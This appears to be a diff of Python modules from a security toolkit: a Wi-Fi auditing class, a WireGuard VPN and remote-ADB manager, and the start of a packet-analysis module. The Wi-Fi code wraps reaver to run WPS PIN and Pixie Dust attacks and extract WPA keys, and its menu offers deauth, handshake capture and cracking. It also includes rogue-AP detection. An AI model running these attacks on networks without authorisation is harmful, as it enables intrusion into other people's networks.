if os.path.exists(known_file):
with open(known_file) as f:
self.known_aps = json.load(f)
return self.known_aps
def detect_rogue_aps(self) -> Dict:
"""Compare current scan against known APs to detect evil twins/rogues."""
if not self.known_aps:
self.load_known_aps()
if not self.known_aps:
return {'ok': False, 'error': 'No baseline APs saved. Run save_known_aps first.'}
known_bssids = {ap['bssid'] for ap in self.known_aps}
known_ssids = {ap['ssid'] for ap in self.known_aps if ap['ssid']}
known_pairs = {(ap['bssid'], ap['ssid']) for ap in self.known_aps}
alerts = []
for bssid, ap in self.scan_results.items():
if bssid not in known_bssids:
if ap.ssid in known_ssids:
# Same SSID, different BSSID = possible evil twin
alerts.append({
'type': 'evil_twin',
'severity': 'high',
'bssid': bssid,
'ssid': ap.ssid,
'channel': ap.channel,
'signal': ap.signal,
'message': f'Possible evil twin: SSID "{ap.ssid}" from unknown BSSID {bssid}'
})
else:
# Completely new AP
alerts.append({
'type': 'new_ap',
'severity': 'low',
'bssid': bssid,
'ssid': ap.ssid,
'channel': ap.channel,
'signal': ap.signal,
'message': f'New AP detected: "{ap.ssid}" ({bssid})'
})
else:
# Known BSSID but check for SSID change
if (bssid, ap.ssid) not in known_pairs and ap.ssid:
alerts.append({
'type': 'ssid_change',
'severity': 'medium',
'bssid': bssid,
'ssid': ap.ssid,
'message': f'Known AP {bssid} changed SSID to "{ap.ssid}"'
})
return {
'ok': True,
'alerts': alerts,
'alert_count': len(alerts),
'scanned': len(self.scan_results),
'known': len(self.known_aps)
}
# ── WPS Attack ───────────────────────────────────────────────────────
def wps_scan(self, interface: str = None) -> Dict:
"""Scan for WPS-enabled networks using wash."""
iface = interface or self.monitor_interface
if not self.wash:
return {'ok': False, 'error': 'wash not found'}
if not iface:
return {'ok': False, 'error': 'No monitor interface'}
try:
result = subprocess.run(
[self.wash, '-i', iface, '-s'],
capture_output=True, text=True, timeout=15
)
networks = []
for line in result.stdout.splitlines():
parts = line.split()
if len(parts) >= 6 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]):
networks.append({
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'locked': parts[4].upper() == 'YES',
'ssid': ' '.join(parts[5:])
})
return {'ok': True, 'networks': networks, 'count': len(networks)}
except Exception as e:
return {'ok': False, 'error': str(e)}
def wps_attack(self, interface: str, bssid: str, channel: int,
pixie_dust: bool = True, timeout: int = 300) -> str:
"""Run WPS PIN attack (Pixie Dust or brute force). Returns job_id."""
if not self.reaver:
return ''
job_id = f'wps_{int(time.time())}'
self._jobs[job_id] = {
'type': 'wps', 'status': 'running', 'bssid': bssid,
'result': None, 'started': time.time()
}
def _attack():
try:
cmd = [self.reaver, '-i', interface, '-b', bssid, '-c', str(channel), '-vv']
if pixie_dust:
cmd.extend(['-K', '1'])
result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
pin_match = re.search(r'WPS PIN:\s*[\'"]?(\d+)', result.stdout)
psk_match = re.search(r'WPA PSK:\s*[\'"]?(.+?)[\'"]?\s*$', result.stdout, re.M)
if pin_match or psk_match:
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': True,
'pin': pin_match.group(1) if pin_match else None,
'psk': psk_match.group(1) if psk_match else None,
'message': 'WPS attack successful'
}
else:
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': False, 'error': 'WPS attack failed',
'output': result.stdout[-500:] if result.stdout else ''
}
except subprocess.TimeoutExpired:
self._jobs[job_id]['status'] = 'error'
self._jobs[job_id]['result'] = {'ok': False, 'error': 'WPS attack timed out'}
except Exception as e:
self._jobs[job_id]['status'] = 'error'
self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
threading.Thread(target=_attack, daemon=True).start()
return job_id
# ── Packet Capture ───────────────────────────────────────────────────
def start_capture(self, interface: str, channel: int = None,
bssid: str = None, output_name: str = None) -> Dict:
"""Start raw packet capture on interface."""
if not self.airodump:
return {'ok': False, 'error': 'airodump-ng not found'}
iface = interface or self.monitor_interface
if not iface:
return {'ok': False, 'error': 'No monitor interface'}
name = output_name or f'capture_{int(time.time())}'
prefix = os.path.join(self.captures_dir, name)
cmd = [self.airodump, '--output-format', 'pcap,csv', '-w', prefix]
if channel:
cmd += ['-c', str(channel)]
if bssid:
cmd += ['--bssid', bssid]
cmd.append(iface)
try:
self._capture_proc = subprocess.Popen(
cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)
return {
'ok': True,
'message': f'Capture started on {iface}',
'prefix': prefix,
'pid': self._capture_proc.pid
}
except Exception as e:
return {'ok': False, 'error': str(e)}
def stop_capture(self) -> Dict:
"""Stop running packet capture."""
if self._capture_proc:
try:
self._capture_proc.send_signal(signal.SIGINT)
self._capture_proc.wait(timeout=5)
except Exception:
self._capture_proc.kill()
self._capture_proc = None
return {'ok': True, 'message': 'Capture stopped'}
return {'ok': False, 'error': 'No capture running'}
def list_captures(self) -> List[Dict]:
"""List saved capture files."""
captures = []
cap_dir = Path(self.captures_dir)
for f in sorted(cap_dir.glob('*.cap')) + sorted(cap_dir.glob('*.pcap')):
captures.append({
'name': f.name,
'path': str(f),
'size': f.stat().st_size,
'modified': f.stat().st_mtime
})
return captures
# ── Job Management ───────────────────────────────────────────────────
def get_job(self, job_id: str) -> Optional[Dict]:
"""Get job status."""
return self._jobs.get(job_id)
def list_jobs(self) -> List[Dict]:
"""List all jobs."""
return [{'id': k, **v} for k, v in self._jobs.items()]
# ── Helpers ──────────────────────────────────────────────────────────
def _ap_to_dict(self, ap: AccessPoint) -> Dict:
return {
'bssid': ap.bssid, 'ssid': ap.ssid, 'channel': ap.channel,
'encryption': ap.encryption, 'cipher': ap.cipher, 'auth': ap.auth,
'signal': ap.signal, 'beacons': ap.beacons,
'data_frames': ap.data_frames, 'clients': ap.clients
}
def _client_to_dict(self, c: WifiClient) -> Dict:
return {
'mac': c.mac, 'bssid': c.bssid, 'signal': c.signal,
'frames': c.frames, 'probe': c.probe
}
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_wifi_auditor() -> WiFiAuditor:
global _instance
if _instance is None:
_instance = WiFiAuditor()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for WiFi Auditing module."""
auditor = get_wifi_auditor()
while True:
tools = auditor.get_tools_status()
available = sum(1 for v in tools.values() if v)
print(f"\n{'='*60}")
print(f" WiFi Auditing ({available}/{len(tools)} tools available)")
print(f"{'='*60}")
print(f" Monitor Interface: {auditor.monitor_interface or 'None'}")
print(f" APs Found: {len(auditor.scan_results)}")
print(f" Clients Found: {len(auditor.clients)}")
print()
print(" 1 — List Wireless Interfaces")
print(" 2 — Enable Monitor Mode")
print(" 3 — Disable Monitor Mode")
print(" 4 — Scan Networks")
print(" 5 — Deauth Attack")
print(" 6 — Capture Handshake")
print(" 7 — Crack Handshake")
print(" 8 — WPS Scan")
print(" 9 — Rogue AP Detection")
print(" 10 — Packet Capture")
print(" 11 — Tool Status")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
ifaces = auditor.get_interfaces()
if ifaces:
for i in ifaces:
print(f" {i['name']} mode={i['mode']} ch={i['channel']}")
else:
print(" No wireless interfaces found")
elif choice == '2':
iface = input(" Interface name: ").strip()
result = auditor.enable_monitor(iface)
print(f" {result.get('message', result.get('error', 'Unknown'))}")
elif choice == '3':
result = auditor.disable_monitor()
print(f" {result.get('message', result.get('error', 'Unknown'))}")
elif choice == '4':
dur = input(" Scan duration (seconds, default 15): ").strip()
result = auditor.scan_networks(duration=int(dur) if dur.isdigit() else 15)
if result['ok']:
print(f" Found {result['count']} access points:")
for ap in result['access_points']:
print(f" {ap['bssid']} {ap['ssid']:<24} ch={ap['channel']} "
f"sig={ap['signal']}dBm {ap['encryption']}")
else:
print(f" Error: {result['error']}")
elif choice == '5':
bssid = input(" Target BSSID: ").strip()
client = input(" Client MAC (blank=broadcast): ").strip() or None
count = input(" Deauth count (default 10): ").strip()
result = auditor.deauth(auditor.monitor_interface, bssid, client,
int(count) if count.isdigit() else 10)
print(f" {result.get('message', result.get('error'))}")
elif choice == '6':
bssid = input(" Target BSSID: ").strip()
channel = input(" Channel: ").strip()
if bssid and channel.isdigit():
job_id = auditor.capture_handshake(auditor.monitor_interface, bssid, int(channel))
print(f" Handshake capture started (job: {job_id})")
print(" Polling for result...")
while True:
job = auditor.get_job(job_id)
if job and job['status'] != 'running':
print(f" Result: {job['result']}")
break
time.sleep(3)
elif choice == '7':
cap = input(" Capture file path: ").strip()
wl = input(" Wordlist path: ").strip()
bssid = input(" BSSID (optional): ").strip() or None
if cap and wl:
job_id = auditor.crack_handshake(cap, wl, bssid)
if job_id:
print(f" Cracking started (job: {job_id})")
else:
print(" aircrack-ng not found")
elif choice == '8':
result = auditor.wps_scan()
if result['ok']:
print(f" Found {result['count']} WPS networks:")
for n in result['networks']:
locked = 'LOCKED' if n['locked'] else 'open'
print(f" {n['bssid']} {n['ssid']:<24} WPS {n['wps_version']} {locked}")
else:
print(f" Error: {result['error']}")
elif choice == '9':
if not auditor.known_aps:
print(" No baseline saved. Save current scan as baseline? (y/n)")
if input(" > ").strip().lower() == 'y':
auditor.save_known_aps()
print(f" Saved {len(auditor.known_aps)} APs as baseline")
else:
result = auditor.detect_rogue_aps()
if result['ok']:
print(f" Scanned: {result['scanned']} Known: {result['known']} Alerts: {result['alert_count']}")
for a in result['alerts']:
print(f" [{a['severity'].upper()}] {a['message']}")
elif choice == '10':
print(" 1 — Start Capture")
print(" 2 — Stop Capture")
print(" 3 — List Captures")
sub = input(" > ").strip()
if sub == '1':
result = auditor.start_capture(auditor.monitor_interface)
print(f" {result.get('message', result.get('error'))}")
elif sub == '2':
result = auditor.stop_capture()
print(f" {result.get('message', result.get('error'))}")
elif sub == '3':
for c in auditor.list_captures():
print(f" {c['name']} ({c['size']} bytes)")
elif choice == '11':
for tool, avail in tools.items():
status = 'OK' if avail else 'MISSING'
print(f" {tool:<15} {status}")

View File

@@ -0,0 +1,503 @@
"""
WireGuard VPN Manager - Server management, client CRUD, remote ADB
Manage WireGuard VPN server, clients, and remote ADB connections over VPN tunnel.
"""
DESCRIPTION = "WireGuard VPN + Remote ADB manager"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "defense"
class WireGuardVPN:
"""Interactive WireGuard VPN menu."""
def __init__(self):
from core.wireguard import get_wireguard_manager
self.mgr = get_wireguard_manager()
def show_menu(self):
status = self.mgr.get_server_status()
running = status.get('running', False)
endpoint = status.get('endpoint', 'N/A')
clients = self.mgr.get_all_clients()
peer_status = self.mgr.get_peer_status() if running else {}
# Count online peers
online = 0
for c in clients:
ps = peer_status.get(c.get('public_key', ''), {})
hs = ps.get('latest_handshake')
if hs is not None and hs < 180:
online += 1
print(f"\n{'='*55}")
print(" WireGuard VPN Manager")
print(f"{'='*55}")
print(f" Interface: {status.get('interface', 'wg0')} | "
f"Status: {'Running' if running else 'Stopped'}")
print(f" Endpoint: {endpoint}")
print(f" Clients: {len(clients)} ({online} online)")
print()
print(" -- Server --")
print(" 1) Server Status")
print(" 2) Start Interface")
print(" 3) Stop Interface")
print(" 4) Restart Interface")
print()
print(" -- Clients --")
print(" 10) List All Clients")
print(" 11) Create New Client")
print(" 12) View Client Detail")
print(" 13) Delete Client")
print(" 14) Enable/Disable Client")
print(" 15) Import Existing Peers")
print()
print(" -- Remote ADB --")
print(" 20) ADB Connect (TCP/IP)")
print(" 21) ADB Disconnect")
print(" 22) Auto-Connect All Peers")
print(" 23) List Remote ADB Devices")
print()
print(" -- USB/IP --")
print(" 30) USB/IP Status")
print(" 31) Load USB/IP Modules")
print(" 32) List Remote USB Devices")
print(" 33) Attach USB Device")
print(" 34) Detach USB Device")
print(" 35) List Attached Ports")
print()
print(" -- Config --")
print(" 40) Generate Client Config")
print(" 41) Show QR Code (terminal)")
print(" 42) Refresh UPnP Mapping")
print()
print(" 0) Back")
print()
# ── Helpers ─────────────────────────────────────────────────────
def _pick_client(self, prompt=" Select client #: "):
"""Select a client from the list."""
clients = self.mgr.get_all_clients()
if not clients:
print(" No clients configured.")
return None
print("\n Clients:")
for i, c in enumerate(clients, 1):
status = "ON " if c.get('enabled', True) else "OFF"
print(f" {i}) [{status}] {c['name']} ({c['assigned_ip']})")
try:
choice = int(input(prompt).strip())
if 1 <= choice <= len(clients):
return clients[choice - 1]
except (ValueError, EOFError, KeyboardInterrupt):
pass
return None
def _pick_client_ip(self, prompt=" Client IP (or # to select): "):
"""Get a client IP either directly or by selection."""
try:
val = input(prompt).strip()
except (EOFError, KeyboardInterrupt):
return None
if not val:
return None
# If numeric, treat as selection
if val.isdigit():
clients = self.mgr.get_all_clients()
idx = int(val) - 1
if 0 <= idx < len(clients):
return clients[idx]['assigned_ip']
print(" Invalid selection.")
return None
return val
# ── Server ─────────────────────────────────────────────────────
def do_server_status(self):
status = self.mgr.get_server_status()
print(f"\n Server Status:")
print(f" Interface: {status.get('interface', 'wg0')}")
print(f" Running: {status.get('running', False)}")
print(f" Public Key: {status.get('public_key', 'N/A')}")
print(f" Endpoint: {status.get('endpoint', 'N/A')}")
print(f" Listen Port: {status.get('listen_port', 'N/A')}")
print(f" Peers: {status.get('peer_count', 0)}")
if status.get('error'):
print(f" Error: {status['error']}")
def do_start(self):
print(" Starting WireGuard interface...")
result = self.mgr.start_interface()
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_stop(self):
print(" Stopping WireGuard interface...")
result = self.mgr.stop_interface()
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_restart(self):
print(" Restarting WireGuard interface...")
result = self.mgr.restart_interface()
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
# ── Clients ────────────────────────────────────────────────────
def do_list_clients(self):
clients = self.mgr.get_all_clients()
peer_status = self.mgr.get_peer_status()
if not clients:
print("\n No clients configured.")
return
print(f"\n {'Name':<20} {'IP':<16} {'Status':<8} {'Handshake':<20} {'RX/TX'}")
print(f" {'-'*80}")
for c in clients:
ps = peer_status.get(c.get('public_key', ''), {})
hs = ps.get('latest_handshake')
hs_str = ps.get('latest_handshake_str', 'never')
if hs is not None and hs < 180:
status = 'ONLINE'
elif hs is not None:
status = 'idle'
else:
status = 'offline'
if not c.get('enabled', True):
status = 'disabled'
rx = ps.get('transfer_rx_str', '-')
tx = ps.get('transfer_tx_str', '-')
print(f" {c['name']:<20} {c['assigned_ip']:<16} {status:<8} "
f"{hs_str:<20} {rx}/{tx}")
def do_create_client(self):
try:
name = input(" Client name: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not name:
print(" Name required.")
return
try:
dns = input(f" DNS [{self.mgr._default_dns}]: ").strip()
allowed = input(f" Allowed IPs [{self.mgr._default_allowed_ips}]: ").strip()
except (EOFError, KeyboardInterrupt):
return
print(f" Creating client '{name}'...")
result = self.mgr.create_client(
name,
dns=dns or None,
allowed_ips=allowed or None)
if result.get('ok'):
client = result['client']
print(f" Created: {client['name']} ({client['assigned_ip']})")
print(f" ID: {client['id']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_view_client(self):
client = self._pick_client()
if not client:
return
print(f"\n Client: {client['name']}")
print(f" ID: {client['id']}")
print(f" IP: {client['assigned_ip']}")
print(f" Public Key: {client['public_key']}")
print(f" PSK: {'Yes' if client.get('preshared_key') else 'No'}")
print(f" DNS: {client.get('dns', 'default')}")
print(f" Allowed IPs: {client.get('allowed_ips', 'default')}")
print(f" Enabled: {client.get('enabled', True)}")
print(f" Created: {client.get('created_at', 'N/A')}")
# Show live status
peer_status = self.mgr.get_peer_status()
ps = peer_status.get(client['public_key'], {})
if ps:
print(f" Handshake: {ps.get('latest_handshake_str', 'never')}")
print(f" Endpoint: {ps.get('endpoint', 'N/A')}")
print(f" RX: {ps.get('transfer_rx_str', '-')}")
print(f" TX: {ps.get('transfer_tx_str', '-')}")
def do_delete_client(self):
client = self._pick_client()
if not client:
return
try:
confirm = input(f" Delete '{client['name']}'? (y/N): ").strip().lower()
except (EOFError, KeyboardInterrupt):
return
if confirm != 'y':
print(" Cancelled.")
return
result = self.mgr.delete_client(client['id'])
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_toggle_client(self):
client = self._pick_client()
if not client:
return
current = client.get('enabled', True)
new_state = not current
action = 'Enable' if new_state else 'Disable'
try:
confirm = input(f" {action} '{client['name']}'? (y/N): ").strip().lower()
except (EOFError, KeyboardInterrupt):
return
if confirm != 'y':
print(" Cancelled.")
return
result = self.mgr.toggle_client(client['id'], new_state)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_import_peers(self):
print(" Importing existing peers from wg0.conf...")
result = self.mgr.import_existing_peers()
if result.get('ok'):
print(f" Imported {result['imported']} peers.")
else:
print(f" Error: {result.get('error', 'Failed')}")
# ── Remote ADB ─────────────────────────────────────────────────
def do_adb_connect(self):
clients = self.mgr.get_all_clients()
if clients:
print("\n Available clients:")
for i, c in enumerate(clients, 1):
print(f" {i}) {c['name']} ({c['assigned_ip']})")
ip = self._pick_client_ip()
if not ip:
return
print(f" Connecting to {ip}:5555...")
result = self.mgr.adb_connect(ip)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_adb_disconnect(self):
ip = self._pick_client_ip(" Client IP to disconnect: ")
if not ip:
return
result = self.mgr.adb_disconnect(ip)
print(f" {result.get('message', 'Done')}")
def do_auto_connect(self):
print(" Auto-connecting to all active WG peers...")
result = self.mgr.auto_connect_peers()
for r in result.get('results', []):
status = "OK" if r['result'].get('ok') else "FAIL"
print(f" [{status}] {r['name']} ({r['ip']}): "
f"{r['result'].get('message', r['result'].get('error', ''))}")
if not result.get('results'):
print(" No active peers found.")
def do_list_adb_devices(self):
devices = self.mgr.get_adb_remote_devices()
if not devices:
print("\n No remote ADB devices connected via WireGuard.")
return
print(f"\n Remote ADB Devices:")
for d in devices:
print(f" {d['serial']} - {d['state']} "
f"{'(' + d['model'] + ')' if d.get('model') else ''}")
# ── USB/IP ─────────────────────────────────────────────────────
def do_usbip_status(self):
status = self.mgr.get_usbip_status()
print(f"\n USB/IP Status:")
print(f" Available: {status['available']}")
print(f" Modules loaded: {status['modules_loaded']}")
print(f" Active imports: {status['active_imports']}")
if status.get('ports'):
for p in status['ports']:
print(f" Port {p['port']}: {p['status']}")
def do_load_modules(self):
result = self.mgr.load_usbip_modules()
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_list_remote_usb(self):
ip = self._pick_client_ip()
if not ip:
return
print(f" Listing USB devices on {ip}...")
result = self.mgr.usbip_list_remote(ip)
if not result.get('ok'):
print(f" Error: {result.get('error', 'Failed')}")
return
devices = result.get('devices', [])
if not devices:
print(" No exportable USB devices found.")
return
for d in devices:
print(f" [{d['busid']}] {d['description']}")
def do_attach_usb(self):
ip = self._pick_client_ip(" Remote host IP: ")
if not ip:
return
# List devices first
result = self.mgr.usbip_list_remote(ip)
devices = result.get('devices', [])
if not devices:
print(" No exportable devices found.")
return
print("\n Available devices:")
for i, d in enumerate(devices, 1):
print(f" {i}) [{d['busid']}] {d['description']}")
try:
choice = input(" Attach #: ").strip()
except (EOFError, KeyboardInterrupt):
return
if choice.isdigit():
idx = int(choice) - 1
if 0 <= idx < len(devices):
busid = devices[idx]['busid']
else:
print(" Invalid selection.")
return
else:
busid = choice
print(f" Attaching {busid} from {ip}...")
result = self.mgr.usbip_attach(ip, busid)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_detach_usb(self):
# Show current ports
ports = self.mgr.usbip_port_status()
if not ports.get('ports'):
print(" No attached USB/IP devices.")
return
print("\n Attached ports:")
for p in ports['ports']:
print(f" Port {p['port']}: {p['status']}")
try:
port = input(" Detach port #: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not port:
return
result = self.mgr.usbip_detach(port)
if result.get('ok'):
print(f" {result['message']}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def do_list_ports(self):
result = self.mgr.usbip_port_status()
if not result.get('ok'):
print(f" Error: {result.get('error', 'Failed')}")
return
ports = result.get('ports', [])
if not ports:
print(" No attached USB/IP ports.")
return
for p in ports:
detail = f" - {p['detail']}" if p.get('detail') else ''
print(f" Port {p['port']}: {p['status']}{detail}")
# ── Config ─────────────────────────────────────────────────────
def do_gen_config(self):
client = self._pick_client()
if not client:
return
config = self.mgr.generate_client_config(client)
print(f"\n Config for {client['name']}:\n")
print(f" {''*40}")
for line in config.split('\n'):
print(f" {line}")
print(f" {''*40}")
def do_show_qr(self):
client = self._pick_client()
if not client:
return
config = self.mgr.generate_client_config(client)
try:
import qrcode
qr = qrcode.QRCode(box_size=1, border=1)
qr.add_data(config)
qr.make(fit=True)
qr.print_ascii(invert=True)
except ImportError:
print(" qrcode module not installed. Install: pip install qrcode")
def do_refresh_upnp(self):
print(" Refreshing UPnP mapping for WireGuard port...")
result = self.mgr.refresh_upnp_mapping()
if result.get('ok'):
print(f" UPnP mapping refreshed.")
else:
print(f" Error: {result.get('error', 'Failed')}")
# ── Main Loop ──────────────────────────────────────────────────
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
actions = {
'1': self.do_server_status,
'2': self.do_start,
'3': self.do_stop,
'4': self.do_restart,
'10': self.do_list_clients,
'11': self.do_create_client,
'12': self.do_view_client,
'13': self.do_delete_client,
'14': self.do_toggle_client,
'15': self.do_import_peers,
'20': self.do_adb_connect,
'21': self.do_adb_disconnect,
'22': self.do_auto_connect,
'23': self.do_list_adb_devices,
'30': self.do_usbip_status,
'31': self.do_load_modules,
'32': self.do_list_remote_usb,
'33': self.do_attach_usb,
'34': self.do_detach_usb,
'35': self.do_list_ports,
'40': self.do_gen_config,
'41': self.do_show_qr,
'42': self.do_refresh_upnp,
}
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
wg = WireGuardVPN()
wg.run_interactive()

283
modules/wireshark.py Normal file
View File

@@ -0,0 +1,283 @@
"""
AUTARCH Wireshark Module
Packet capture and analysis (scapy + optional tshark)
Live capture, PCAP analysis, protocol/conversation/DNS/HTTP analysis,
credential detection.
"""
import os
import sys
from pathlib import Path
# Module metadata
DESCRIPTION = "Packet capture & analysis (scapy)"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen, display_banner
from core.wireshark import get_wireshark_manager
class PacketAnalyzer:
"""Packet capture and analysis tools."""
def __init__(self):
self.mgr = get_wireshark_manager()
def print_status(self, message: str, status: str = "info"):
colors = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"}
print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}")
def show_menu(self):
while True:
clear_screen()
display_banner()
print(f"\n{Colors.BOLD}Wireshark / Packet Analysis{Colors.RESET}")
# Status
status = self.mgr.get_status()
engine = []
if status['scapy']:
engine.append(f'{Colors.GREEN}scapy{Colors.RESET}')
else:
engine.append(f'{Colors.RED}scapy (missing){Colors.RESET}')
if status['tshark']:
engine.append(f'{Colors.GREEN}tshark{Colors.RESET}')
else:
engine.append(f'{Colors.YELLOW}tshark (not found){Colors.RESET}')
print(f" Engine: {' + '.join(engine)}")
if status['can_capture']:
print(f" Live capture: {Colors.GREEN}available{Colors.RESET}")
else:
print(f" Live capture: {Colors.YELLOW}needs root{Colors.RESET}")
print(f"\n {Colors.CYAN}[1]{Colors.RESET} List Interfaces")
print(f" {Colors.CYAN}[2]{Colors.RESET} Start Live Capture")
print(f" {Colors.CYAN}[3]{Colors.RESET} Open PCAP File")
print(f" {Colors.CYAN}[4]{Colors.RESET} Protocol Analysis")
print(f" {Colors.CYAN}[5]{Colors.RESET} Conversation Analysis")
print(f" {Colors.CYAN}[6]{Colors.RESET} DNS Query Analysis")
print(f" {Colors.CYAN}[7]{Colors.RESET} HTTP Traffic Analysis")
print(f" {Colors.CYAN}[8]{Colors.RESET} Credential Detection")
print(f" {Colors.CYAN}[9]{Colors.RESET} Export Results")
print(f" {Colors.CYAN}[0]{Colors.RESET} Back")
choice = input(f"\n{Colors.WHITE}Select option: {Colors.RESET}").strip()
if choice == '0':
break
elif choice == '1':
self.list_interfaces()
elif choice == '2':
self.start_capture()
elif choice == '3':
self.open_pcap()
elif choice == '4':
self.protocol_analysis()
elif choice == '5':
self.conversation_analysis()
elif choice == '6':
self.dns_analysis()
elif choice == '7':
self.http_analysis()
elif choice == '8':
self.credential_detection()
elif choice == '9':
self.export_results()
def list_interfaces(self):
"""List network interfaces."""
print(f"\n{Colors.BOLD}Network Interfaces{Colors.RESET}")
interfaces = self.mgr.list_interfaces()
if not interfaces:
self.print_status("No interfaces found", "error")
else:
for i, iface in enumerate(interfaces, 1):
desc = f" ({iface['description']})" if iface.get('description') else ''
print(f" {Colors.CYAN}{i}.{Colors.RESET} {iface['name']}{desc}")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def start_capture(self):
"""Start a live packet capture."""
print(f"\n{Colors.BOLD}Live Capture{Colors.RESET}")
if not self.mgr.can_capture:
self.print_status("Root privileges required for live capture", "error")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
# Show interfaces
interfaces = self.mgr.list_interfaces()
for i, iface in enumerate(interfaces, 1):
print(f" {i}. {iface['name']}")
iface_input = input(f"\n{Colors.WHITE}Interface (name or number, Enter for default): {Colors.RESET}").strip()
interface = None
if iface_input:
try:
idx = int(iface_input) - 1
if 0 <= idx < len(interfaces):
interface = interfaces[idx]['name']
except ValueError:
interface = iface_input
bpf = input(f"{Colors.WHITE}BPF filter (e.g., 'tcp port 80', Enter for all): {Colors.RESET}").strip() or None
duration_str = input(f"{Colors.WHITE}Duration in seconds (default 30): {Colors.RESET}").strip()
duration = int(duration_str) if duration_str.isdigit() else 30
self.print_status(f"Starting capture on {interface or 'default'} for {duration}s...", "info")
result = self.mgr.start_capture(interface=interface, bpf_filter=bpf, duration=duration)
if 'error' in result:
self.print_status(result['error'], "error")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
return
self.print_status(f"Capturing... Output: {result.get('file', '')}", "info")
# Wait for capture to complete
import time
try:
while self.mgr._capture_running:
stats = self.mgr.get_capture_stats()
print(f"\r Packets: {stats.get('packet_count', 0)}", end='', flush=True)
time.sleep(1)
except KeyboardInterrupt:
self.mgr.stop_capture()
stats = self.mgr.get_capture_stats()
print()
self.print_status(f"Capture complete: {stats.get('packet_count', 0)} packets", "success")
if stats.get('output_file'):
self.print_status(f"Saved to: {stats['output_file']}", "info")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def open_pcap(self):
"""Open and load a PCAP file."""
print(f"\n{Colors.BOLD}Open PCAP File{Colors.RESET}")
filepath = input(f"{Colors.WHITE}PCAP file path: {Colors.RESET}").strip()
if not filepath:
return
self.print_status(f"Loading {filepath}...", "info")
result = self.mgr.read_pcap(filepath)
if 'error' in result:
self.print_status(result['error'], "error")
else:
self.print_status(f"Loaded {result['total_packets']} packets from {result['file']}", "success")
# Show first few packets
for pkt in result['packets'][:20]:
print(f" {pkt.get('src','?'):>15} -> {pkt.get('dst','?'):<15} {pkt.get('protocol',''):>8} {pkt.get('info','')}")
if result['total_packets'] > 20:
print(f" ... and {result['total_packets'] - 20} more packets")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def protocol_analysis(self):
"""Show protocol distribution."""
print(f"\n{Colors.BOLD}Protocol Analysis{Colors.RESET}")
result = self.mgr.get_protocol_hierarchy()
if result['total'] == 0:
self.print_status("No packets loaded. Open a PCAP or run a capture first.", "warning")
else:
print(f" Total packets: {result['total']}\n")
for proto, data in result['protocols'].items():
bar_len = int(data['percent'] / 2)
bar = '' * bar_len
print(f" {proto:<12} {data['count']:>6} {data['percent']:>5.1f}% {Colors.CYAN}{bar}{Colors.RESET}")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def conversation_analysis(self):
"""Show IP conversations."""
print(f"\n{Colors.BOLD}Conversation Analysis{Colors.RESET}")
convos = self.mgr.extract_conversations()
if not convos:
self.print_status("No packets loaded.", "warning")
else:
print(f" {'Source':<20} {'Destination':<20} {'Packets':>8} {'Bytes':>10} {'Protocols'}")
print(f" {''*20} {''*20} {''*8} {''*10} {''*20}")
for c in convos[:30]:
protos = ', '.join(c['protocols'][:3])
print(f" {c['src']:<20} {c['dst']:<20} {c['packets']:>8} {c['bytes']:>10} {protos}")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def dns_analysis(self):
"""Show DNS queries."""
print(f"\n{Colors.BOLD}DNS Query Analysis{Colors.RESET}")
queries = self.mgr.extract_dns_queries()
if not queries:
self.print_status("No DNS queries found.", "warning")
else:
print(f" {'Query':<40} {'Type':<6} {'Count':>6} {'Response'}")
print(f" {''*40} {''*6} {''*6} {''*30}")
for q in queries[:40]:
resp = q.get('response', '')[:30]
print(f" {q['query']:<40} {q['type']:<6} {q['count']:>6} {resp}")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def http_analysis(self):
"""Show HTTP requests."""
print(f"\n{Colors.BOLD}HTTP Traffic Analysis{Colors.RESET}")
